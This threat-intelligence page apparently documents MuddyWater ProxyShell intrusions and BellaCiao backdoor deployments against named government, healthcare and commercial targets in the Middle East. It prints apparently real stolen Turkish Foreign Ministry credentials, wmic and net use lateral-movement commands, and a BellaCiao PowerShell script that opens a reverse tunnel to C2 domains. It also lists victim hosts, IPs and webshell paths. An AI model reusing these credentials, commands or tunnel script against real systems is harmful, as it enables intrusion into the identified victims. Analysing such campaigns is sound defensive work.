Skip to main content

Overview

This page documents confirmed cyber attacks identified across Episodes 1-4 of the MuddyWater intelligence collection. The attacks primarily targeted government entities, civilian companies, and media organizations using ProxyShell exploits and BellaCiao backdoor deployments.

Episode 2: ProxyShell Campaign

Turkish Foreign Ministry Attack

The threat actor successfully compromised the Turkish Foreign Ministry’s email infrastructure at eposta.mfa.gov.ct.tr. Attack Details:
  • Target: Turkish Foreign Ministry (eposta.mfa.gov.ct.tr)
  • IP Address: 212.175.168.58
  • Attack Vector: ProxyShell exploitation
  • Webshell Deployed: aspnet_client/system_web/aspnet_client.aspx
  • Post-Exploitation: Credential harvesting, lateral movement
  • Credentials Found:
    • Username: Admin1@MFA
    • Password: KazimAtes1977+-*/!!KazimAtes1977+-*/!!
    • Secondary Account: pfsenselondra@MFA / 1234qqqQQQ
Lateral Movement Commands: 
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\\windows\\temp\\Crashpad\\log.txt 2>&1"

net use \\\\10.20.101.17\\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA

Turkey - Documented Targets

A total of 41 Turkish organizations were compromised via ProxyShell:
OrganizationDomainStatus
Turkish Foreign Ministryeposta.mfa.gov.ct.trShell Deployed
Akbas Groupexchange.akbasoglu.comCompromised
Magma Weldhibrit.magmaweld.comCompromised
Bahcelievler Municipalitymail.bahcelievler.bel.trCompromised
Mersin Municipalitymail.mersin.bel.trGovernment Entity
Aydin Governoratesmtp.aydinaski.gov.trGovernment Entity
KMC Groupmail.kmcgroup.com.trCompromised
Calor Groupwebmail.calor.com.trCompromised
Additional Turkish Targets: mail.24yemek.com.tr, mail.akartextile.com, mail.basturkcam.com.tr, mail.bilpagida.com, mail.dcaokullari.com, mail.dnstrade.com.tr, mail.duzeymode.com, antivirusgw.teknikgumruk.com.tr, mail.gopayless.com.tr, mail.itpro.com.tr, mail.mtplastech.com.tr, mail.narkonteks.com, mail.nisahastanesi.com, mail.noahsark.com.tr, mail.ozerensigorta.com, mail.taf-inter.com, mail.umur.com.tr, mail.uzmantek.com, mail.zenitled.com.tr, mail1.otaknetworks.com, msexc.aydintextil.com.tr, owa.myl.com.tr, srv0.kurgu-e.com, ulak.neutecin.com, webmail.intimesolutions.net

Iran - Documented Targets

Iranian organizations compromised during the campaign:
IP AddressDomainNotes
109.125.132.66-Shell deployed
109.232.1.181mail serverMail system
178.252.191.163qudsdailyMedia organization
185.189.122.142-Error during exploitation
217.218.21.105-Anti-smuggling agency
37.235.27.28-Error during exploitation
45.147.77.137-legacyDN enumeration
Total Iran Targets: 18+ organizations including government anti-smuggling agencies and media outlets.

Saudi Arabia - Documented Targets

Saudi organizations compromised in the campaign:
IP/DomainOrganizationStatus
212.12.165.155-Shell Deployed
77.240.93.43mail serverCompromised
85.184.233.203-Shell Deployed
mail.almanahospital.com.saAl Mana HospitallegacyDN enumeration
mail.ihcc.saIHCClegacyDN enumeration
mail1.manafea.netManafeaShell Deployed
mail1.solbsteel.comSolb SteelCompromised
webmail.almanahospital.com.saAl Mana HospitalFailed attempt
Additional Saudi Targets: mail.aiccp.com.sa, mail.albarakatgroup.com, mail.alrashidabetong.com, mail.arabian-homes.com, mail.goldenbrown.sa, mail.sosgroup.com, mail.tanhatmining.com, smtp.baroid-sa.com, outbound.familycare.com.sa Total Saudi Targets: 29 organizations across healthcare, industrial, and commercial sectors.

Kuwait - Documented Targets

21 Kuwaiti organizations were targeted:
OrganizationDomainType
Kuwait Chamber of Commercewebmail.kccec.com.kwGovernment
Kout Cloudmx02.koutcloud.com, mx03.koutcloud.comInfrastructure
Zamzam Takafulsmg.zamzamtakaful.comFinancial
KFMBmail.kfmb.com.kwCompany
Azzad Groupmail.azzadgroup.com.kwCompany
KYFCOexch1.kyfco.comCompany
Additional Kuwait Targets: mail.yousifi.com.kw, mail.sih-kw.com, mail.montania.org, mail.kiti.com.kw, and 10 additional IP-based targets.

Episode 3: BellaCiao Backdoor Campaign

BellaCiao Malware Overview

Variant 1: Service-based persistence
  • Service Name: “Java Update Services” / “Microsoft Exchange Services Log”
  • Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • Technique: Disguised as legitimate Microsoft/Java service
Variant 2: Web-based backdoor
  • Configuration: Port 8000, 24-hour alive time
  • Components:
    • Service: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe (hidden)
    • Plink: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
    • Webserver: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • C2 Domains: twittsupport.com, msn-center.uk
  • Credentials: Username: Israel / Password: Israel@123!
  • Port Forwarding: 127.0.0.1:9090:127.0.0.1:49450

Dubai Police Attack

The BellaCiao Variant 2 specifically targeted Dubai Police infrastructure: Configuration Found: 
subdomain=> dubaipolice
service name=Java Update Services
port=>8000
alive time=>24
PowerShell Connection Script: 
$domain = "twittsupport.com"
$domain2 = "msn-center.uk"
$Path = "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe"
$command = "echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"

Episode 4: Ransomware Operations

Evidence of ransomware deployment activities:

Infrastructure

  • Payment Tracking: Bitcoin payment records (0-SERVICE-payment BTC.csv)
  • Service Records: Victim tracking database (0-SERVICE-Service.csv)
  • Network Data: Target network information (1-NET-Sheet1.csv)

Failed Operations Log

Shell deployment failures documented at 49 locations across:
  • Austria (At): 5 failed attempts
  • Australia (Au): 1 failed attempt
  • Azerbaijan (Az): 1 confirmed shell
  • Germany (De): Multiple attempts with mixed success
  • France (Fr): 4 targets including mail.lemstyle.ru
  • India (In): 2 targets
  • Israel (il): 3 targets including prizma-hakirot.co.il, interprom.co.il
  • South Korea (Kr): 1 target
  • Turkey (Tr): 3 targets including bilpagida.com, kmcgroup.com.tr
  • United Kingdom (Uk): 5 targets

Attack Vector Summary

ProxyShell Exploitation (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

Typical Attack Path:
  1. ProxyShell vulnerability exploitation on Microsoft Exchange servers
  2. Webshell deployment to /owa/auth/ or /aspnet_client/ directories
  3. Credential harvesting and legacyDN enumeration
  4. Lateral movement via WMI and network share access
  5. Deployment of BellaCiao backdoor for persistent access
Webshell Naming Patterns:
  • Randomized 5-10 character names: msfuj.aspx, webclient.aspx, wsrnt.aspx
  • System-themed names: OutlookOU.aspx, errorFE.aspx, logon.aspx

Geographic Distribution

Primary Target Countries:
  1. Turkey: 41+ organizations (Government, Private Sector)
  2. Saudi Arabia: 29 organizations (Healthcare, Industrial, Commercial)
  3. Kuwait: 21 organizations (Government, Financial, Commercial)
  4. Iran: 18+ organizations (Government, Media)
  5. UAE: Government infrastructure (Dubai Police)
  6. Global: 49+ additional targets across Europe, Asia, Middle East

Impact Assessment

Sectors Affected

  • Government: Foreign ministries, municipalities, law enforcement
  • Healthcare: Hospitals and medical facilities
  • Financial: Insurance, investment firms
  • Industrial: Manufacturing, steel, textiles
  • Media: News organizations
  • Technology: IT service providers
  • Infrastructure: Email and hosting providers

Compromise Indicators

High Confidence Compromises:
  • Turkish Foreign Ministry (confirmed credentials, lateral movement)
  • Dubai Police (BellaCiao backdoor configuration)
  • 30+ organizations with confirmed shell deployment
Medium Confidence:
  • 50+ organizations with ProxyShell vulnerability exploitation attempts
  • Multiple failed exploitation attempts indicating reconnaissance

Defender Recommendations

See the Analysis Summary page for detailed defensive recommendations.

Build docs developers (and LLMs) love

Get started for freeTalk to us